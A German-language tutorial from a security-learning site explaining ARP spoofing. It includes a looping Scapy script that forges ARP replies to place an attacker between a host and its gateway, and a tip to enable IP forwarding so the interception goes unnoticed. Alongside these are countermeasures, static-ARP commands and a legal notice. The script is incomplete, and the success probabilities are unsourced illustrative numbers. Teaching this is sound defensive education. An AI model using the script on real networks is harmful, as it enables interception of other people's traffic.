bi
labs.
cybernetwork

ARP Spoofing erklärt

Layer-2 Angriff verstehen – IP/MAC Zuordnung täuschen in lokalen Netzwerken.

2 min readbilabs
0:00--:--

Was ist ARP Spoofing?

ARP-Spoofing ist kein Hexenwerk. Du täuschst nur die Zuordnung IP ↔ MAC. Der Rest sind Tools.

ARP (Address Resolution Protocol) löst IP-Adressen zu MAC-Adressen auf. Das passiert in Layer 2 (Data Link).

Wie funktioniert ARP?

  1. Host A will mit Host B kommunizieren
  2. Host A kennt nur die IP von B
  3. Host A sendet ARP-Request: "Wer hat IP 192.168.1.100?"
  4. Host B antwortet: "Ich! Meine MAC ist aa:bb:cc:dd:ee:ff"
  5. Host A cached diese Info in seiner ARP-Tabelle

Der Angriff

Du sendest gefälschte ARP-Replies an beide Hosts:

# Beispiel mit Scapy
from scapy.all import ARP, send

target_ip = "192.168.1.100"
gateway_ip = "192.168.1.1"
attacker_mac = "11:22:33:44:55:66"

# Täusche Target vor, Gateway ist attacker_mac
arp_target = ARP(op=2, pdst=target_ip, hwdst=target_mac,
                 psrc=gateway_ip, hwsrc=attacker_mac)

# Täusche Gateway vor, Target ist attacker_mac
arp_gateway = ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac,
                  psrc=target_ip, hwsrc=attacker_mac)

# Sende kontinuierlich
while True:
    send(arp_target, verbose=False)
    send(arp_gateway, verbose=False)
    time.sleep(2)

Mathematische Analyse

Die Wahrscheinlichkeit PP eines erfolgreichen MITM-Angriffs hängt von mehreren Faktoren ab:

P(success)=P(noIDS)×P(noStaticARP)×P(trafficForwarding)P(success) = P(noIDS) \times P(noStaticARP) \times P(trafficForwarding)

Wo:

  • P(noIDS)P(noIDS) = Wahrscheinlichkeit, dass kein IDS aktiv ist
  • P(noStaticARP)P(noStaticARP) = Wahrscheinlichkeit, dass keine statischen ARP-Einträge existieren
  • P(trafficForwarding)P(trafficForwarding) = Wahrscheinlichkeit korrekter Traffic-Weiterleitung

In ungesicherten Netzwerken gilt oft:

P(success)0.95×0.90×0.85=0.72P(success) \approx 0.95 \times 0.90 \times 0.85 = 0.72

Gegenmaßnahmen

  1. Static ARP Entries – manuelle IP/MAC-Zuordnung
  2. ARP Inspection – Switch validiert ARP-Pakete
  3. Port Security – limitiert MACs pro Port
  4. Encryption – HTTPS/TLS macht MITM nutzlos

Praxisbeispiel: Static ARP

# Linux
sudo arp -s 192.168.1.1 aa:bb:cc:dd:ee:ff

# Windows
arp -s 192.168.1.1 aa-bb-cc-dd-ee-ff

# macOS
sudo arp -s 192.168.1.1 aa:bb:cc:dd:ee:ff

Timeline eines Angriffs

T0: Attacker startet ARP-Spoofing
T1: Target aktualisiert ARP-Cache (2-5s)
T2: Traffic läuft über Attacker
T3: IDS schlägt Alarm (wenn vorhanden)
T4: ARP-Cache expired (60-120s)
T5: Attacker muss Reply wiederholen

Key Takeaways

  • ARP hat keine Authentifizierung
  • Funktioniert nur im lokalen Netzwerk (Layer 2)
  • IP Forwarding aktivieren, sonst merkst du den Angriff sofort
  • Moderne Switches haben ARP Inspection – nutze es

Rechtlicher Hinweis: ARP-Spoofing ohne Erlaubnis ist illegal. Nur in eigenen Test-Netzwerken oder mit schriftlicher Genehmigung.

Fragen zur Lesson?

Diskutiere im bilabs Discord über diese Lesson, stelle Fragen oder teile deine Lösungsansätze.

Discord beitreten